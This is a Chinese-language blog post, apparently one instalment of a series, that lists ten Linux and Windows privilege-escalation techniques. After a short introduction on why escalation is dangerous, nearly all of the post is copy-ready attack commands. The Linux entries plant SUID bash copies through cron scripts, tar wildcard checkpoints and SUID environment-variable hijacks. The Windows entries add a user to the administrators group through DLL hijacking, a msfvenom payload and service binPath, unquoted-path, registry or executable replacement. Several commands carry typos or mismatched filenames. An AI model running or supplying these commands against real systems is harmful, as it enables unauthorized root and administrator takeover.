特权升级的危险是显而易见的。通过提升权限,攻击者可以绕过网络安全措施,从而损害数据完整性、机密性和系统可用性。对于组织而言,这可能会导致数据泄露、系统停机以及潜在的法律和声誉后果。识别权限升级的迹象并部署预防性网络安全措施对于保护数字资产并确保只有授权人员才能访问关键系统功能至关重要。
主要有两种类型:垂直升级和水平升级。在垂直升级中,具有较低级别权限的攻击者将其权限提升到较高级别用户(通常是管理员)的权限。这使得他们能够访问受限区域、修改系统配置,甚至部署恶意软件。另一方面,横向升级涉及访问属于对等用户的资源或功能,并利用类似特权帐户的权限。
截至目前,我们一共分享了19种提权方法,本期我们继续整理了10种热门提权方式,本期分享完后,我们一共分享了29种方法离100种方法也快完在1/3了,继续查收哟,:
1.Abusing Scheduled Tasks via Cron Path Overwrite
域:No
Local Admin: Yes
操作系统: Linux
类型: Abusing Scheduled Tasks
方法:
echo ‘cp /bin/bash /tmp/bash; chmod +s /tmp/bash’ > systemupdate.sh;
chmod +x systemupdate.sh
等待一会儿
/tmp/bash -p
id && whoami
2.Abusing Scheduled Tasks via Cron Wildcards
域:No
Local Admin: Yes
操作系统: Linux
类型: Abusing Scheduled Tasks
方法:
echo ‘cp /bin/bash /tmp/bash; chmod +s /tmp/bash’ > /home/user/systemupdate.sh;
touch /home/user/ –checkpoint=1;
touch /home/user/ –checkpoint-action=exec=sh\systemupdate.sh
等待一会儿
/tmp/bash -p
id && whoami
3.Abusing File Permission via SUID Binaries – Symlink)
域:No
Local Admin: Yes
操作系统: Linux
类型: Abusing File Permission
方法:
su – www-data;
nginxed-root.sh /var/log/nginx/error.log;
In root user
invoke-rc.d nginx rotate >/dev/null 2>&1
4.Abusing File Permission via SUID Binaries – Environment Variables #1)
域:No
Local Admin: Yes
操作系统: Linux
类型: Abusing File Permission
方法:
echo ‘int main() { setgid(0); setuid(0); system(“/bin/bash”); return 0; }’ >/tmp/service.c;
gcc /tmp/services.c -o /tmp/service;
export PATH=/tmp:$PATH;
/usr/local/bin/sudi-env; id
5.Abusing File Permission via SUID Binaries – Environment Variables #2)
域:No
Local Admin: Yes
操作系统: Linux
类型: Abusing File Permission
方法:
env -i SHELLOPTS=xtrace PS4=‘$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +S /tmp/bash)’ /bin/sh -c /usr/local/bin/suid-env2; set +x; /tmp/bash -p
6.DLL Hijacking
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
Windows_dll.c: cmd.exe /k net localgroup administrators user /add
x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll
sc stop dllsvc & sc start dllsvc
7.Abusing Services via binPath
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
sc config daclsvc binpath= “net localgroup administrators user /add”
sc start daclsvc
8.Abusing Services via Unquoted Path
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
msfvenom -p windows/exec CMD=’net localgroup administrators user /add’ -f exe-service -o common.exe
common.exe 放在 ‘C:\Program Files\Unquoted Path Service’.
sc start unquotedsvc
9.Abusing Services via Registry
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t
REG_EXPAND_SZ /d c:\temp\x.exe /f
sc start regsvc
10.Abusing Services via Executable File
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
copy /y c:\Temp\x.exe “c:\Program Files\File Permissions Service\filepermservice.exe”
sc start filepermsvc